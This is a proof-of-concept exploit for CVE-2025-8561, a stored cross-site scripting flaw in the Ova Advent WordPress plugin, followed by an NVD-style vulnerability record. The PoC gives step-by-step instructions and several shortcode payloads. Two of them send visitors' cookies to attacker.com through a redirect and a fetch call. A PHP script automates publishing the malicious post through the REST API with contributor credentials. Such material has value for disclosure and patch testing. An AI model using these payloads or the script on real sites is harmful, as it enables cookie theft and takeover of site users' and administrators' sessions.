CVE-2025-8561

<!-- PoC for CVE-2025-8561 - Stored XSS in WordPress Ova Advent Plugin Vulnerability: Insufficient input sanitization and output escaping on shortcode attributes Required: Contributor-level access or above --> <!-- Step 1: Login as a contributor or higher privileged user --> <!-- Step 2: Create a new post or page --> <!-- Step 3: Insert the following shortcode with malicious payload in the content editor --> [ova_advent event=""><script>alert('XSS-CVE-2025-8561');document.location='https://attacker.com/steal?cookie='+document.cookie</script>"] <!-- Alternative payloads for different contexts --> <!-- Payload targeting event attribute --> [ova_advent event="<img src=x onerror=alert(document.domain)>"] <!-- Payload targeting title attribute --> [ova_advent title="<svg/onload=alert('XSS')>"] <!-- Payload for cookie exfiltration --> [ova_advent event="<script>fetch('https://attacker.com/log?c='+document.cookie)</script>"] <!-- Step 4: Publish/Submit the post for review --> <!-- Step 5: When any user (including admins) views the published page, the malicious script executes --> <!-- Automated exploitation example using WordPress XML-RPC or REST API with authenticated session --> <?php // Exploitation script using WordPress REST API $wp_url = 'https://target-wordpress-site.com'; $username = 'contributor_user'; $password = 'password123'; // Authenticate $auth_response = wp_remote_post($wp_url . '/wp-json/jwt-auth/v1/token', array( 'body' => json_encode(array( 'username' => $username, 'password' => $password )), 'headers' => array('Content-Type' => 'application/json') )); $token = json_decode(wp_remote_retrieve_body($auth_response))->token; // Create post with malicious shortcode $xss_payload = '[ova_advent event=""><script>alert(document.domain)</script>"]'; $post_response = wp_remote_post($wp_url . '/wp-json/wp/v2/posts', array( 'body' => json_encode(array( 'title' => 'Test Post', 'content' => $xss_payload, 'status' => 'publish' )), 'headers' => array( 'Content-Type' => 'application/json', 'Authorization' => 'Bearer ' . $token ) )); ?>

{"cve": {"id": "CVE-2025-8561", "sourceIdentifier": "[email protected]", "published": "2025-10-15T06:15:46.203", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Ova Advent plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in all versions up to, and including, 1.1.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-87"}]}], "references": [{"url": "https://themeforest.net/item/em4u-event-management-multipurpose-wordpress-theme/20846579", "source": "[email protected]"}, {"url": "https://themeforest.net/item/em4u-event-management-multipurpose-wordpress-theme/20846579#item-description__change_log", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/da6bf521-0c22-4839-8fa6-a0d67e28cfbd?source=cve", "source": "[email protected]"}]}}